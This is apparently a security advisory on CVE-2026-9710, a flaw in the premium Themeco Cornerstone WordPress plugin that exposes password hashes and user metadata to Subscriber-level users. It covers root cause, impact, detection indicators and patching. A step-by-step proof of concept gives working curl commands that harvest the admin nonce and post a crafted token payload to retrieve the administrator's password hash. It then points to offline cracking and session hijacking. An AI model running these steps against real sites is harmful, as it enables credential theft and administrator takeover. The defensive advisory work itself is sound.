CVE-2026-9710: 
WordPress Analisi e mitigazione delle vulnerabilità

CVE-2026-9710 is an authenticated sensitive data disclosure vulnerability in the premium Themeco Cornerstone WordPress plugin (bundled with the X Theme) that allows any logged-in user with Subscriber-level access or higher to retrieve raw password hashes and arbitrary user metadata. The flaw affects Cornerstone versions from 3.0.0 up to (but not including) 7.8.8, distributed inside X Theme 10.8.5 and earlier from theme.co. It does not affect the unrelated free cornerstone plugin (v0.8.x) available on the WordPress.org repository. The vulnerability was publicly disclosed on June 3, 2026, with a patch released on June 24, 2026. WPScan classifies it with a CVSS score of 7.7 (High) (WPScan, GitHub Advisory).

The root cause is a missing capability check (CWE-200: Information Exposure) on the plugin's CSS-preview request handler endpoint (?cs-css=1). The plugin unconditionally injects an admin nonce (_cs_nonce) into every wp-admin page for all authenticated users, regardless of their role. An attacker can extract this nonce from any wp-admin page (e.g., /wp-admin/profile.php), then POST a crafted JSON payload to the CSS-preview endpoint specifying a target user_id and requesting the user_pass meta key. The dynamic content token engine evaluates the request against the target user's database record and returns the raw bcrypt or PHPass password hash directly in the HTTP response. Any other user meta key (e.g., wp_capabilities, session_tokens) can similarly be exfiltrated by changing the key= argument (WPScan).

Successful exploitation allows any authenticated WordPress user (Subscriber role or above) to exfiltrate the raw password hash (user_pass) and arbitrary user metadata for any account on the site, including administrators. Recovered bcrypt or PHPass hashes can be subjected to offline cracking, potentially leading to full administrator account takeover, site defacement, data theft, or further lateral movement within the hosting environment. Session tokens and capability metadata exposed via the same mechanism could also enable direct session hijacking without requiring password cracking (WPScan, GitHub Advisory).

1. Authenticate as a low-privileged user: Log in to the target WordPress site with any account (Subscriber or higher) using a standard authentication request:

curl -sk -c jar -X POST "https://TARGET/wp-login.php" \
  --data-urlencode "log=subscriber" \
  --data-urlencode "pwd=PASSWORD" \
  --data-urlencode "wp-submit=Log In" \
  --data-urlencode "redirect_to=https://TARGET/wp-admin/" \
  --data-urlencode "testcookie=1" -o /dev/null

2. Extract the Cornerstone admin nonce: Fetch any wp-admin page and parse the _cs_nonce value that Cornerstone unconditionally injects for all logged-in users:

curl -sk -b jar "https://TARGET/wp-admin/profile.php" -o profile.html
CS_NONCE=$(python3 -c 'import re,json,sys;h=open("profile.html").read();m=re.search(r"csAdminData\s*=\s*({.*?});",h,re.DOTALL);print(json.loads(m.group(1))["common"]["_cs_nonce"])')

3. POST a dynamic-content token payload to the CSS-preview endpoint: Target the administrator account (user_id=1) and request the user_pass meta key:

curl -sk -b jar -X POST "https://TARGET/?cs-css=1" \
  -H "Content-Type: application/json" \
  --data "{\"_nonce\":\"$CS_NONCE\",\"request\":{\"type\":\"post-process-css\",\"previewState\":{\"documentId\":1,\"settings\":{}},\"items\":[{\"css\":\"{{dc:user:meta key=\\\"user_pass\\\" user=\\\"1\\\"}}\"}]}}"

4. Retrieve the password hash: The server responds with HTTP 200 and a JSON body containing the raw user_pass value (e.g., $wp$2y$12$...), which can be submitted to an offline cracking tool such as Hashcat or John the Ripper.
5. Escalate access: Use the cracked administrator password to log in with full privileges, or substitute other meta keys (e.g., session_tokens) to attempt direct session hijacking (WPScan).

• Network: Unusual POST requests to /?cs-css=1 originating from low-privileged user sessions; JSON payloads containing dc:user:meta tokens with key=user_pass or other sensitive meta keys targeting arbitrary user IDs.
• Logs: WordPress access logs showing repeated POST requests to /?cs-css=1 from authenticated sessions not associated with page builder editing activity; HTTP 200 responses to these requests from non-administrator accounts.
• Logs: Requests to /wp-admin/profile.php or other wp-admin pages immediately followed by POST requests to /?cs-css=1 from the same session cookie, suggesting nonce harvesting.
• Logs: JSON request bodies in access logs containing post-process-css type requests with user_pass, session_tokens, or wp_capabilities as the requested meta key (WPScan).

Update the premium Themeco Cornerstone plugin to version 7.8.8 or later (distributed inside X Theme 10.8.6 or later from theme.co). No official configuration-based workaround has been published; the only reliable remediation is applying the patch. As interim measures, administrators should restrict wp-admin access to trusted IP addresses where possible, audit user accounts for unexpected Subscriber-level registrations, and monitor access logs for suspicious POST requests to /?cs-css=1. If immediate patching is not possible, consider temporarily disabling the Cornerstone plugin (WPScan, GitHub Advisory).

The vulnerability was discovered and submitted by researcher Real_King_Engine (ISAL FRAMEWORK), who also provided the detailed PoC. WPScan verified the report and published it on June 3, 2026. No notable broader media coverage or significant social media discussion has been identified beyond standard vulnerability database aggregation (WPScan).